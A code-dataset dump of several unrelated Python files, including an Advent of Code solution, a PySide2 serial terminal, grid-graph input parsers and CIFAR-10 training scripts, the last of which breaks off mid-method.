seq_id stringlengths 4 11 | text stringlengths 113 2.92M | repo_name stringlengths 4 125 ⌀ | sub_path stringlengths 3 214 | file_name stringlengths 3 160 | file_ext stringclasses 18
values | file_size_in_byte int64 113 2.92M | program_lang stringclasses 1
value | lang stringclasses 93
values | doc_type stringclasses 1
value | stars int64 0 179k ⌀ | dataset stringclasses 3
values | pt stringclasses 78
values |
|---|---|---|---|---|---|---|---|---|---|---|---|---|
def main(filename):
    """Solve both parts of the puzzle against the same input file."""
    for solve in (part_one, part_two):
        solve(filename)
def part_one(filename):
    """Starting with a frequency of zero, print the resulting frequency after
    all of the changes in frequency have been applied.

    :param filename: path to a file with one signed integer per line
    """
    with open(filename, "r") as f:
        # Iterate the file lazily; no need to materialize readlines() + a list.
        print(sum(int(num) for num in f))
def part_two(filename):
    """Print the first frequency the device reaches twice.

    The list of frequency changes is replayed over and over; duplicates may
    appear mid-list, so every intermediate frequency is checked.
    """
    with open(filename, "r") as f:
        deltas = [int(line) for line in f.readlines()]
    frequency = 0
    seen = {frequency}
    while True:
        for delta in deltas:
            frequency += delta
            if frequency in seen:
                print(frequency)
                return
            seen.add(frequency)
if __name__ == "__main__":
main("input.txt")
| jonabantao/advent_of_code | 2018/day01/day1.py | day1.py | py | 1,179 | python | en | code | 0 | github-code | 90 |
16849667560 | import sys
from enum import Enum
import serial
import serial.tools.list_ports
from serial.threaded import ReaderThread, Protocol
from PySide2.QtGui import QPalette
from PySide2.QtCore import Qt, QObject, Slot, Signal
from PySide2.QtWidgets import QApplication, qApp, QWidget
from PySide2.QtWidgets import QPushButton, QComboBox, QGridLayout, QDialog, QPlainTextEdit, QStatusBar
from PySide2.QtWidgets import QTabWidget, QDialogButtonBox, QVBoxLayout, QLineEdit, QFormLayout
import re
# Map Qt key codes of non-printing keys to the single byte forwarded over the
# serial link (values match Windows virtual-key / ASCII control codes).
g_key_map = {
    Qt.Key_Left: 0x25,
    Qt.Key_Up: 0x26,
    Qt.Key_Right: 0x27,
    Qt.Key_Down: 0x28,
    Qt.Key_Backspace: 0x08,
    Qt.Key_Tab: 0x09,
    Qt.Key_Enter: 0x0D,
    Qt.Key_Shift: 0x10,
    Qt.Key_Control: 0x11,
    Qt.Key_Alt: 0x12,
    Qt.Key_Space: 0x20,
    Qt.Key_Insert: 0x2D,
    Qt.Key_Delete: 0x2E
}
_ANSI2HTML_STYLES = {}
ANSI2HTML_CODES_RE = re.compile('(?:\033\\[(\d+(?:;\d+)*)?([cnRhlABCDfsurgKJipm]))')
ANSI2HTML_PALETTE = {
# See http://ethanschoonover.com/solarized
'solarized': ['#073642', '#D30102', '#859900', '#B58900', '#268BD2', '#D33682', '#2AA198', '#EEE8D5', '#002B36', '#CB4B16', '#586E75', '#657B83', '#839496', '#6C71C4', '#93A1A1', '#FDF6E3'],
# Above mapped onto the xterm 256 color palette
'solarized-xterm': ['#262626', '#AF0000', '#5F8700', '#AF8700', '#0087FF', '#AF005F', '#00AFAF', '#E4E4E4', '#1C1C1C', '#D75F00', '#585858', '#626262', '#808080', '#5F5FAF', '#8A8A8A', '#FFFFD7'],
# Gnome default:
'tango': ['#000000', '#CC0000', '#4E9A06', '#C4A000', '#3465A4', '#75507B', '#06989A', '#D3D7CF', '#555753', '#EF2929', '#8AE234', '#FCE94F', '#729FCF', '#AD7FA8', '#34E2E2', '#EEEEEC'],
# xterm:
'xterm': ['#000000', '#CD0000', '#00CD00', '#CDCD00', '#0000EE', '#CD00CD', '#00CDCD', '#E5E5E5', '#7F7F7F', '#FF0000', '#00FF00', '#FFFF00', '#5C5CFF', '#FF00FF', '#00FFFF', '#FFFFFF'],
'console': ['#000000', '#AA0000', '#00AA00', '#AA5500', '#0000AA', '#AA00AA', '#00AAAA', '#AAAAAA', '#555555', '#FF5555', '#55FF55', '#FFFF55', '#5555FF', '#FF55FF', '#55FFFF', '#FFFFFF'],
}
def _ansi2html_get_styles(palette):
    """Return ``(regular_style, bold_style, indexed_style)`` for *palette*,
    building and caching the dictionaries on first use.

    ``regular_style``/``bold_style`` map SGR parameter strings ('1', '31',
    '42', ...) to CSS fragments; ``indexed_style`` maps xterm 256-color
    indices ('0'..'255') to '#RRGGBB' strings.
    """
    if palette not in _ANSI2HTML_STYLES:
        p = ANSI2HTML_PALETTE.get(palette, ANSI2HTML_PALETTE['console'])
        regular_style = {
            '1': '',  # bold is handled by switching to bold_style
            '2': 'opacity:0.5',
            '4': 'text-decoration:underline',
            '5': 'font-weight:bold',
            '7': '',
            '8': 'display:none',
        }
        bold_style = regular_style.copy()
        for i in range(8):
            regular_style['3%s' % i] = 'color:%s' % p[i]
            regular_style['4%s' % i] = 'background-color:%s' % p[i]
            # Bold text uses the bright half of the 16-color palette.
            bold_style['3%s' % i] = 'color:%s' % p[i + 8]
            bold_style['4%s' % i] = 'background-color:%s' % p[i + 8]
        # The default xterm 256 colour cube + grayscale ramp:
        indexed_style = {}
        for i in range(16):
            indexed_style['%s' % i] = p[i]
        for rr in range(6):
            for gg in range(6):
                for bb in range(6):
                    i = 16 + rr * 36 + gg * 6 + bb
                    r = (rr * 40 + 55) if rr else 0
                    g = (gg * 40 + 55) if gg else 0
                    b = (bb * 40 + 55) if bb else 0
                    # BUG FIX: emit a valid CSS colour with a '#' prefix
                    # (entries 0-15 above already carry one); the original
                    # also risked str.join receiving None.
                    indexed_style['%s' % i] = '#%02X%02X%02X' % (r, g, b)
        for gray in range(24):
            i = gray + 232
            level = gray * 10 + 8
            indexed_style['%s' % i] = '#%02X%02X%02X' % (level, level, level)
        _ANSI2HTML_STYLES[palette] = (regular_style, bold_style, indexed_style)
    return _ANSI2HTML_STYLES[palette]
def ansi2html(text, palette='solarized'):
    """Convert ANSI SGR escape sequences in *text* to nested HTML <span>s.

    Only 'm' (SGR) sequences are interpreted; any other escape is dropped.
    Open spans are tracked on ``stack`` and closed on reset (code 0) or at
    the end of the text.
    """
    def _ansi2html(m):
        # Regex replacement callback; `stack` and the style dicts come from
        # the enclosing scope.
        if m.group(2) != 'm':
            return ''
        state = None
        sub = ''
        cs = m.group(1)
        cs = cs.strip() if cs else ''
        for c in cs.split(';'):
            # Normalize: strip leading zeros; empty parameter means reset.
            c = c.strip().lstrip('0') or '0'
            if c == '0':
                # SGR reset: close every open span.
                while stack:
                    sub += '</span>'
                    stack.pop()
            elif c in ('38', '48'):
                # Extended foreground/background colour introducer.
                extra = [c]
                state = 'extra'
            elif state == 'extra':
                # '5' = indexed (256-colour), '2' = direct RGB.
                if c == '5':
                    state = 'idx'
                elif c == '2':
                    state = 'r'
            elif state:
                if state == 'idx':
                    extra.append(c)
                    state = None
                    # 256 colors
                    color = indexed_style.get(c)  # TODO: convert index to RGB!
                    if color is not None:
                        sub += '<span style="%s:%s">' % ('color' if extra[0] == '38' else 'background-color', color)
                        stack.append(extra)
                elif state in ('r', 'g', 'b'):
                    # Collect the three RGB components.
                    extra.append(c)
                    if state == 'r':
                        state = 'g'
                    elif state == 'g':
                        state = 'b'
                    else:
                        state = None
                        # NOTE(review): `extra` still contains the leading
                        # '38'/'48' marker, so it is joined into the hex
                        # string too (8 hex digits) — looks like extra[1:]
                        # was intended; confirm before relying on RGB mode.
                        try:
                            color = '#' + ''.join('%02X' % c if 0 <= c <= 255 else None for x in extra for c in [int(x)])
                        except (ValueError, TypeError):
                            pass
                        else:
                            sub += '<span style="%s:%s">' % ('color' if extra[0] == '38' else 'background-color', color)
                            stack.append(extra)
            else:
                # Plain attribute (bold, underline, 16-colour fg/bg, ...);
                # bold context switches to the bright palette.
                if '1' in stack:
                    style = bold_style.get(c)
                else:
                    style = regular_style.get(c)
                if style is not None:
                    sub += '<span style="%s">' % style
                    stack.append(c)  # Still needs to be added to the stack even if style is empty (so it can check '1' in stack above, for example)
        return sub
    stack = []
    regular_style, bold_style, indexed_style = _ansi2html_get_styles(palette)
    sub = ANSI2HTML_CODES_RE.sub(_ansi2html, text)
    # Close any spans left open at end-of-text.
    while stack:
        sub += '</span>'
        stack.pop()
    return sub
class ConnectParam:
    """Base descriptor of a connection; *type* is a transport tag string."""

    def __init__(self, type):
        self.type = type
class SerialParam(ConnectParam):
    """Connection descriptor for a serial port (default baud 115200)."""

    def __init__(self, port, baud=115200):
        ConnectParam.__init__(self, 'serial')
        self.port = port
        self.baud = baud
class ConnectType(Enum):
    """Supported connection transports."""
    Serial = 1
    Ssh = 2
class ComboBox(QComboBox):
    """QComboBox that also emits ``clicked`` on a left-button press,
    so the owner can refresh the item list lazily before it opens."""
    clicked = Signal()
    def __init__(self, parent=None):
        QComboBox.__init__(self, parent)
    def mousePressEvent(self, event):
        if event.button() == Qt.LeftButton:
            self.clicked.emit()
        # Keep the default popup behaviour.
        super().mousePressEvent(event)
class Console(QPlainTextEdit):
    """Terminal-style widget: displays incoming serial data and forwards
    keystrokes to the link via ``key_data_signal``."""

    key_data_signal = Signal(str)

    def __init__(self, parent=None):
        self.parent = parent
        QPlainTextEdit.__init__(self, parent)
        self.m_localEchoEnabled = False
        self.document().setMaximumBlockCount(100)
        # Classic green-on-black terminal palette.
        p = QPalette()
        p.setColor(QPalette.Base, Qt.black)
        p.setColor(QPalette.Text, Qt.green)
        self.setPalette(p)

    def putData(self, data):
        """Append received text and keep the view scrolled to the bottom."""
        # d = ansi2html(data)
        # self.appendHtml(data)
        if data == '\r':
            return
        self.insertPlainText(data)
        bar = self.verticalScrollBar()
        bar.setValue(bar.maximum())

    def setLocalEchoEnabled(self, bool_value):
        """Enable/disable echoing typed characters into the widget."""
        self.m_localEchoEnabled = bool_value

    def keyPressEvent(self, e):
        if self.m_localEchoEnabled:
            # BUG FIX: the original unbound call was missing ``self``
            # (QPlainTextEdit.keyPressEvent(e)) and raised TypeError.
            QPlainTextEdit.keyPressEvent(self, e)
        if self.parent.alive:
            if e.text():
                # BUG FIX: e.text is a method — call it, don't print the
                # bound-method object.
                print('key: ', e.text())
                self.key_data_signal.emit(e.text())
            elif e.key() in g_key_map:
                # Translate non-printing keys to their control byte.
                print('key: 0x%x' % g_key_map[e.key()])
                self.key_data_signal.emit(chr(g_key_map[e.key()]))

    def mousePressEvent(self, e):
        # Clicking the console focuses it so keystrokes are captured.
        self.setFocus()
class SerialProtocol(Protocol, QObject):
    """serial.threaded protocol bridging reader-thread callbacks to Qt
    signals, so widget updates happen on the GUI thread."""
    ENCODING = 'utf-8'
    UNICODE_HANDLING = 'replace'
    connected_signal = Signal()
    connect_losed_signal = Signal()  # NOTE(review): name likely meant 'connect_lost'
    ingoing_data_signal = Signal(str)
    def __init__(self):
        QObject.__init__(self)
        self.transport = None
    def bind_signals(self, parent):
        """Wire this protocol's signals to *parent*'s slots and announce
        that the connection is up."""
        self.connected_signal.connect(parent.connected)
        self.connect_losed_signal.connect(parent.connect_losed)
        self.ingoing_data_signal.connect(parent.ingoing_data)
        self.connected_signal.emit()
    def connection_made(self, transport):
        """Store transport"""
        self.transport = transport
    def data_received(self, data):
        """Buffer received data, find TERMINATOR, call handle_packet"""
        # Decode with replacement so malformed bytes never raise.
        d = data.decode(self.ENCODING, self.UNICODE_HANDLING)
        sys.stdout.write('line received: {!r}\n'.format(d))
        self.ingoing_data_signal.emit(d)
    def connection_lost(self, exc):
        # Called from the reader thread when the port closes or errors.
        if exc:
            print(exc)
        sys.stdout.write('port closed\n')
        self.transport = None
        self.connect_losed_signal.emit()
    def write_packet(self, data, is_binary):
        """Send *data* out the port; text is encoded with ENCODING."""
        if self.transport:
            if is_binary:
                self.transport.write(data)
            else:
                self.transport.write(data.encode(self.ENCODING, self.UNICODE_HANDLING))
class SerialWindow(QWidget):
    """Tab page hosting a Console bound to one serial port."""

    def __init__(self, parent=None, port=None, baud=115200):
        QWidget.__init__(self, parent)
        self.alive = False  # set True once the reader thread reports 'opened'
        self.console = Console(self)
        self.console.key_data_signal.connect(self.write_data)
        self.status_bar = QStatusBar(self)
        layout = QGridLayout(self)
        layout.addWidget(self.console)
        layout.addWidget(self.status_bar)
        # Open the port and pump it from a background reader thread.
        ser = serial.serial_for_url(port, baudrate=baud, timeout=1)
        t = ReaderThread(ser, SerialProtocol)
        t.start()
        _, self.protocol = t.connect()
        self.protocol.bind_signals(self)

    def showStatusMessage(self, message):
        self.status_bar.showMessage(message)

    @Slot()
    def connected(self):
        self.showStatusMessage('opened')
        self.alive = True

    @Slot()
    def connect_losed(self):
        self.showStatusMessage('closed')
        self.alive = False

    @Slot(str)
    def ingoing_data(self, data):
        """Append data received from the port to the console."""
        self.console.putData(data)

    @Slot(str, int)
    def write_data(self, data, is_binary=0):
        """Forward console keystrokes to the serial link."""
        self.protocol.write_packet(data, is_binary)

    @Slot()
    def handle_error(self, error):
        # Dead trailing 'pass' removed; show the error in the status bar.
        self.showStatusMessage(error)
class NewConnectDialog(QDialog):
    """Modal dialog offering serial and SSH connection forms in tabs."""
    new_connect_window_signal = Signal(ConnectParam)
    def __init__(self, parent):
        QDialog.__init__(self, parent)
        self.parent = parent
        self.setWindowTitle('新建窗口')
        tabwidget = QTabWidget()
        tabwidget.addTab(SerialConnectForm(self), '串口')
        tabwidget.addTab(SshConnectForm(self), u'SSH')
        layout = QVBoxLayout()
        layout.addWidget(tabwidget)
        self.setLayout(layout)
        # Forward accepted connection parameters to the main window.
        self.new_connect_window_signal.connect(parent.new_connect_window)
    @Slot(ConnectParam)
    def new_connect(self, param):
        """Relay *param* to the main window, then close this dialog."""
        self.new_connect_window_signal.emit(param)
        self.close_window()
    @Slot()
    def close_window(self):
        self.close()
class BaseForm(QDialog):
    """Modal dialog base: a vertical layout plus an OK/Cancel button row."""
    def __init__(self, parent):
        QDialog.__init__(self, parent)
        self.main_layout = QVBoxLayout(self)
        self.setModal(True)
    def add_confirm_cancel_box(self):
        """Append the OK ('确定') / Cancel ('取消') box; subclasses connect
        its accepted/rejected signals themselves."""
        cancel_btn = QPushButton('取消')
        ok_btn = QPushButton('确定')
        self.ok_cancel_box = QDialogButtonBox()
        self.ok_cancel_box.addButton(ok_btn, QDialogButtonBox.AcceptRole)
        self.ok_cancel_box.addButton(cancel_btn, QDialogButtonBox.RejectRole)
        self.main_layout.addWidget(self.ok_cancel_box)
class SerialConnectForm(BaseForm):
    """Form for picking a serial device and baud rate."""

    ok_signal = Signal(SerialParam)

    def __init__(self, parent):
        BaseForm.__init__(self, parent)
        self.setWindowTitle('串口设置')
        self.serial_name_comb = ComboBox()
        self.serial_name_comb.addItem('Please choose device')
        self.serial_name_comb.setEditable(True)
        # self.serial_name_comb.clicked.connect(self.list_ports)
        self.serial_port_edit = QLineEdit()
        self.serial_baud_edit = QLineEdit()
        format_layout = QFormLayout()
        format_layout.addRow('设备名:', self.serial_name_comb)
        format_layout.addRow('端口:', self.serial_port_edit)
        format_layout.addRow('波特率:', self.serial_baud_edit)
        self.main_layout.addLayout(format_layout)
        self.add_confirm_cancel_box()
        self.ok_cancel_box.accepted.connect(self.ok)
        self.ok_cancel_box.rejected.connect(parent.close_window)
        self.ok_signal.connect(parent.new_connect)
        self.list_ports()
        print("Now there are {} Items".format(self.serial_name_comb.count()))

    @Slot()
    def ok(self):
        """Emit a SerialParam built from the form fields."""
        print('accepted')
        device = self.serial_name_comb.currentText()
        # BUG FIX: honour the baud-rate field (it used to be ignored);
        # fall back to the 115200 default on empty or invalid input.
        baud_text = self.serial_baud_edit.text().strip()
        try:
            baud = int(baud_text) if baud_text else 115200
        except ValueError:
            baud = 115200
        self.ok_signal.emit(SerialParam(device, baud))

    def __deinit__(self):
        # NOTE(review): '__deinit__' is not a Python special method and is
        # never invoked automatically.
        print('SerialConnectForm __deinit__')

    def list_ports(self):
        """Refresh the combo box with the currently attached serial ports."""
        port_list = serial.tools.list_ports.comports()
        if len(port_list):
            self.serial_name_comb.clear()
            for index, port in enumerate(port_list):
                print(port.device)
                self.serial_name_comb.addItem(port.device)
class SshConnectForm(BaseForm):
    """Form collecting SSH host / port / user.

    NOTE(review): the OK/Cancel buttons are not connected to any slot here,
    so this tab cannot actually start a connection — confirm intended.
    """
    def __init__(self, parent=None):
        BaseForm.__init__(self, parent)
        self.setWindowTitle('SSH设置')
        self.setFixedSize(600, 450)
        self.host_edit = QLineEdit(self)
        self.port_edit = QLineEdit(self)
        self.user_edit = QLineEdit(self)
        format_layout = QFormLayout()
        format_layout.addRow('HOST:', self.host_edit)
        format_layout.addRow('PORT:', self.port_edit)
        format_layout.addRow('USER:', self.user_edit)
        self.main_layout.addLayout(format_layout)
        self.add_confirm_cancel_box()
class MainWindow(QWidget):
    """Top-level window: a tab widget with a welcome tab and one tab per
    open serial connection."""

    def __init__(self, parent=None):
        QWidget.__init__(self, parent)
        self.setWindowTitle('串口助手')
        self.setFixedSize(800, 600)
        self.tabwidget = QTabWidget(self)
        new_connect_btn = QPushButton(text='新建连接', parent=self.tabwidget)
        new_connect_btn.clicked.connect(self.new_connect_dialog)
        self.tabwidget.addTab(new_connect_btn, '欢迎')
        self.layout = QVBoxLayout()
        self.layout.addWidget(self.tabwidget)
        self.setLayout(self.layout)
        # Centre the window on the desktop.
        # BUG FIX: QWidget.move() takes ints; '/' produces floats on Python 3.
        desktop = qApp.desktop()
        self.move((desktop.width() - self.width()) // 2,
                  (desktop.height() - self.height()) // 2)

    @Slot()
    def new_connect_dialog(self):
        """Pop up the modal 'new connection' dialog."""
        dialog = NewConnectDialog(self)
        dialog.setModal(True)
        dialog.show()

    @Slot(ConnectParam)
    def new_connect_window(self, param: ConnectParam):
        """Open a tab for *param*; only the serial transport is implemented."""
        if param.type == 'serial':
            serialWindow = SerialWindow(self, param.port, param.baud)
            self.tabwidget.addTab(serialWindow, '串口')
            self.tabwidget.setCurrentWidget(serialWindow)
app = QApplication()
mainWindow = MainWindow()
mainWindow.show()
sys.exit(app.exec_())
| imxood/imxood.github.io | src/program/python/app/serial_tool/app.py | app.py | py | 15,654 | python | en | code | 0 | github-code | 90 |
71273055977 | import re
def parse_vertex_and_square_ids(
    data: str, start_string: str = "Square ID", end_string: str = "# Edges",
) -> dict:
    """Return a dictionary mapping vertex IDs to integer square IDs.

    Only the text between *start_string* and *end_string* is considered;
    every non-empty line there has the form ``vertex_id,square_id``.

    :param data: read-in input file
    :param start_string: marker the section starts after, defaults to 'Square ID'
    :param end_string: marker the section ends before, defaults to '# Edges'
    :return: dict of vertex ID -> square ID (int)
    """
    section = data.split(start_string)[-1].split(end_string)[0]
    ids_map = {}
    for line in section.split("\n"):
        if not line:
            continue  # skip blanks produced by surrounding whitespace
        fields = line.split(",")
        ids_map[fields[0]] = int(fields[1])
    return ids_map
def parse_edges_and_weights(
    data: str, start_string: str = "Distance", end_string: str = "# Source",
) -> list:
    """Return a list of ``[from_vertex, to_vertex, weight]`` edge triples.

    Only the text between *start_string* and *end_string* is considered;
    every non-empty line there is a comma-separated row of integers.

    :param data: read-in input file
    :param start_string: marker the section starts after, defaults to 'Distance'
    :param end_string: marker the section ends before, defaults to '# Source'
    :return: list of lists of ints
    """
    section = data.split(start_string)[-1].split(end_string)[0]
    return [
        [int(field) for field in line.split(",")]
        for line in section.split("\n")
        if line  # skip blanks produced by surrounding whitespace
    ]
def parse_src_and_dest(data: str) -> tuple:
    """Return the (source, destination) vertex numbers found in *data*.

    The source is the digit run following ``S,`` and the destination the
    digit run following ``D,``; each must be terminated by a newline.

    :param data: read-in input file
    :return: (source, destination) as ints
    """
    source_matches = re.findall(r"S,([0-9]*)\n", data)
    dest_matches = re.findall(r"D,([0-9]*)\n", data)
    return int(source_matches[0]), int(dest_matches[0])
def compute_square_coordinates(height: int = 10, width: int = 10) -> list:
    """Compute coordinates of the bottom right corner for each square on the 10x10 grid, where each square is of size 10x10.

    This function will store the coordinate information of the bottom right corner of each square for subsequent use.
    Indices in the resultant lists are equal to respective Square IDs.

    NOTE(review): loc_y is never reset between rows, so y accumulates
    across the whole grid (10 .. height*width*10) instead of cycling
    10..width*10 per row — confirm this is the intended coordinate scheme.

    :param height: height of the grid, defaults to 10
    :type height: int
    :param width: width of the grid, defaults to 10
    :type width: int
    :return: list of approximate square coordinates
    :rtype: list
    """
    square_coordinates = []
    # initialize location of the top left corner of the grid (square 0)
    loc_x, loc_y = 0, 0
    # move down 10 times
    for i in range(height):
        loc_x = loc_x - 10
        # move right 10 times
        for j in range(width):
            loc_y = loc_y + 10
            square_coordinates.append((loc_x, loc_y))
    return square_coordinates
| jeannadark/search_alchemy | constructor/input_reader.py | input_reader.py | py | 4,847 | python | en | code | 1 | github-code | 90 |
# Read a 4-digit number and decide whether it can be read as YYMM, MMYY,
# both (AMBIGUOUS) or neither (NA).  A two-digit group is a valid month
# exactly when it lies in 1..12.
S = int(input())
first_two = S // 100  # leading two digits
last_two = S % 100    # trailing two digits
yymm_valid = 1 <= last_two <= 12
mmyy_valid = 1 <= first_two <= 12
if yymm_valid and mmyy_valid:
    print('AMBIGUOUS')
elif yymm_valid:
    print('YYMM')
elif mmyy_valid:
    print('MMYY')
else:
    print('NA')
| Aasthaengg/IBMdataset | Python_codes/p03042/s889911714.py | s889911714.py | py | 306 | python | en | code | 0 | github-code | 90 |
18406265649 | import sys
# Read a weighted tree/forest and 2-colour the vertices so that two vertices
# get the same colour iff their path distance is even: colour every vertex
# with (distance from its component root) mod 2.
sys.setrecursionlimit(10**8)
N = int(input())
graph = [[] for _ in range(N)]
# N-1 undirected weighted edges (1-based input, stored 0-based).
for i in range(1, N):
    u, v, w = map(int, input().split())
    graph[u-1].append((v-1, w))
    graph[v-1].append((u-1, w))
color = [0 for _ in range(N)]      # cumulative distance from component root
visited = [False for _ in range(N)]
def dfs(now):
    # Recursively propagate cumulative distances to unvisited neighbours.
    for adj in graph[now]:
        v, dist = adj
        if visited[v]:
            continue
        visited[v] = True
        color[v] = color[now] + dist
        dfs(v)
    return
# Cover every component (handles a forest as well as a single tree).
for start in range(N):
    if not visited[start]:
        color[start] = 0
        visited[start] = True
        dfs(start)
# Emit the parity of each vertex's distance as its colour.
for i in range(N):
    print(color[i] % 2)
| Aasthaengg/IBMdataset | Python_codes/p03044/s848594458.py | s848594458.py | py | 651 | python | en | code | 0 | github-code | 90 |
72660149416 | import numpy as np
from tensorflow.keras.datasets.cifar10 import load_data
from keras.utils.np_utils import to_categorical
import tensorflow as tf
def cifar10_load():
    """Load CIFAR-10 and split the 50k training images into 45k train /
    5k dev; labels are one-hot encoded and pixels rescaled to [0, 1].

    :return: ((x_train, y_train), (x_dev, y_dev), (x_test, y_test))
    """
    (x_train_n, y_train_n), (x_test, y_test) = load_data()
    # Copy the slices so later in-place edits cannot alias keras' arrays.
    x_train = np.copy(x_train_n[:45000])
    y_train = np.copy(y_train_n[:45000])
    x_dev = np.copy(x_train_n[45000:])
    y_dev = np.copy(y_train_n[45000:])
    y_train = to_categorical(y_train)
    y_dev = to_categorical(y_dev)
    y_test = to_categorical(y_test)
    return (x_train/255.0, y_train), (x_dev/255.0, y_dev), (x_test/255.0, y_test)
def initialize_uninitialized(sess):
    """Initialize only the TF1 global variables not yet initialized in
    *sess*, leaving already-initialized (e.g. trained) variables untouched.

    :param sess: an active tf.Session
    """
    global_vars = tf.global_variables()
    is_not_initialized = sess.run([tf.is_variable_initialized(var) for var in global_vars])
    not_initialized_vars = [v for (v, f) in zip(global_vars, is_not_initialized) if not f]
    #print([str(i.name) for i in not_initialized_vars]) # only for testing
    if len(not_initialized_vars):
        sess.run(tf.variables_initializer(not_initialized_vars))
| HaojieYuan/RobustNN | Benchmark_detection/utils.py | utils.py | py | 1,016 | python | en | code | 0 | github-code | 90 |
41010176788 | from datetime import datetime
import matplotlib as mpl
mpl.use('Agg') # NOQA
from lasagnekit.easy import BatchOptimizer, BatchIterator, get_batch_slice
from lasagnekit.nnet.capsule import Capsule
from lasagnekit.easy import iterate_minibatches
from lasagne import updates
from lasagnekit.updates import santa_sss
updates.santa_sss = santa_sss # NOQA
import theano
import theano.tensor as T
import numpy as np
import json
from skimage.io import imsave
from lasagnekit.datasets.infinite_image_dataset import Transform
class MyBatchIterator(BatchIterator):
    """BatchIterator that augments each mini-batch with randomly
    transformed copies of its images (zoom/rotation/shear/translation/flip).

    NOTE(review): `OrderedDict` and `shuffle` are imported inside the
    ``__main__`` block below, so this class only works when the module is
    run as a script — confirm before importing it elsewhere.
    """
    def __init__(self, nb_data_augmentation=1, **transform_params):
        super(MyBatchIterator, self).__init__()
        # Number of augmented copies appended per batch.
        self.nb_data_augmentation = nb_data_augmentation
        self.transform_params = transform_params
    def transform(self, batch_index, V):
        """Slice batch `batch_index` out of V and append augmented copies,
        then shuffle the combined batch."""
        assert self.batch_size is not None
        assert self.nb_batches is not None
        if isinstance(batch_index, T.TensorVariable):
            batch_slice = get_batch_slice(batch_index,
                                          self.batch_size)
        else:
            batch_slice = slice(batch_index * self.batch_size,
                                (batch_index+1) * self.batch_size)
        d = OrderedDict()
        X = V["X"][batch_slice]
        y = V["y"][batch_slice]
        X_list = [X]
        y_list = [y]
        for i in range(self.nb_data_augmentation):
            # Images are transposed NCHW -> NHWC for Transform.
            tr, _ = Transform(X.transpose(0, 2, 3, 1),
                              np.random,
                              **self.transform_params)
            # NOTE(review): debug artifact — rewrites out.png every batch;
            # (tr+1)/2 suggests pixel values are in [-1, 1].
            imsave("out.png", (((tr[0] + 1) / 2.)))
            X_transformed = tr.transpose((0, 3, 1, 2))
            X_list.append(X_transformed)
            y_list.append(y)
        d["X"] = np.concatenate(X_list, axis=0)
        d["y"] = np.concatenate(y_list, axis=0)
        d["X"], d["y"] = shuffle(d["X"], d["y"])
        return d
if __name__ == "__main__":
from lasagnekit.datasets.cifar10 import Cifar10
from sklearn.utils import shuffle
from sklearn.cross_validation import train_test_split
from collections import OrderedDict
from hp_toolkit.hp import (
Param, make_constant_param,
instantiate_random, instantiate_default
)
import argparse
from models import vgg # NOQA
from models import vgg_small # NOQA
from models import vgg_very_small # NOQA
from models import spatially_sparse # NOQA
from models import nin # NOQA
from models import fully # NOQA
from models import residual # NOQA
from models import residualv2 # NOQA
from models import residualv3 # NOQA
from models import residualv4 # NOQA
from models import residualv5 # NOQA
from lightjob.cli import load_db
db = load_db()
job_content = {}
parser = argparse.ArgumentParser(description='zoo')
parser.add_argument("--budget-hours",
default=np.inf,
help="nb of maximum hours (defaut=inf)")
parser.add_argument("--fast-test", default=False, type=bool)
parser.add_argument("--model", default="vgg", type=str)
parser.add_argument("--default-model", default=False, type=bool)
models = {
"vgg": vgg,
"vgg_small": vgg_small,
"vgg_very_small": vgg_very_small,
"spatially_sparse": spatially_sparse,
"nin": nin,
"fully": fully,
"residual": residual,
"residualv2": residualv2,
"residualv3": residualv3,
"residualv4": residualv4,
"residualv5": residualv5
}
args = parser.parse_args()
model_class = models[args.model]
budget_sec = args.budget_hours * 3600
begin = datetime.now()
seed = np.random.randint(0, 1000000000)
np.random.seed(seed)
fast_test = args.fast_test
rng = np.random
if args.default_model is True:
instantiate = instantiate_default
else:
instantiate = instantiate_random
job = {}
data = Cifar10(batch_indexes=[1, 2, 3, 4, 5])
data.load()
data_test = Cifar10(batch_indexes=[6])
data_test.load()
job['dataset'] = data.__class__.__name__
hp = dict(
learning_rate=Param(initial=0.001, interval=[-4, -2], type='real', scale='log10'),
learning_rate_decay=Param(initial=0.05, interval=[0, 0.1], type='real'),
learning_rate_decay_method=Param(initial='discrete', interval=['exp', 'none', 'sqrt', 'lin', 'discrete'], type='choice'),
momentum=Param(initial=0.9, interval=[0.5, 0.99], type='real'),
weight_decay=make_constant_param(0.),
discrete_learning_rate_epsilon=make_constant_param(1e-4),#NEW TO ADD
discrete_learning_divide=make_constant_param(10.),
l2_decay=Param(initial=0, interval=[-8, -4], type='real', scale='log10'),#NEW TO ADD
max_epochs=make_constant_param(1000),
batch_size=Param(initial=32,
interval=[16, 32, 64, 128],
type='choice'),
patience_nb_epochs=make_constant_param(50),
valid_ratio=make_constant_param(0.15),
patience_threshold=make_constant_param(1),
patience_check_each=make_constant_param(1),
optimization=Param(initial='adam',
interval=['adam', 'nesterov_momentum', 'rmsprop'],
type='choice'),
# data augmentation
nb_data_augmentation=Param(initial=1, interval=[0, 1, 2, 3, 4], type='choice'),
zoom_range=make_constant_param((1, 1)),
rotation_range=make_constant_param((0, 0)),
shear_range=make_constant_param((1, 1)),
translation_range=make_constant_param((-5, 5)),
do_flip=make_constant_param(True)
)
if fast_test is True:
instantiate = instantiate_default
default_params = {}
if fast_test is True:
default_params["max_epochs"] = 1
hp = instantiate(hp, default_params=default_params)
job_content['hp'] = hp
hp_model = model_class.params
hp_model = instantiate(hp_model)
job_content['hp_model'] = hp_model
model = model_class.build_model(
input_width=data.img_dim[1],
input_height=data.img_dim[2],
output_dim=data.output_dim,
**hp_model)
job_content['model'] = model_class.__name__
print(model_class.__name__)
print(json.dumps(hp, indent=4))
print(json.dumps(hp_model, indent=4))
initial_lr = hp["learning_rate"]
    def evaluate(X, y, batch_size=None):
        """Mean accuracy of the (module-level) `nnet` on (X, y),
        predicted in mini-batches of `batch_size`."""
        if batch_size is None:
            batch_size = hp["batch_size"]
        y_pred = []
        for mini_batch in iterate_minibatches(X.shape[0],
                                              batch_size):
            # Collect per-example correctness flags.
            y_pred.extend((nnet.predict(X[mini_batch]) == y[mini_batch]).tolist())
        return np.mean(y_pred)
    class MyBatchOptimizer(BatchOptimizer):
        """BatchOptimizer with a wall-clock budget, per-epoch accuracy
        tracking, exponential moving statistics and LR decay schedules."""
        def quitter(self, update_status):
            # Stop when the base class says so, or the time budget is spent.
            quit = super(MyBatchOptimizer, self).quitter(update_status)
            if (datetime.now() - begin).total_seconds() >= budget_sec:
                print("Budget finished.quit.")
                quit = True
            return quit
        def iter_update(self, epoch, nb_batches, iter_update_batch):
            """Run one epoch, record metrics into job_content and apply the
            configured learning-rate schedule."""
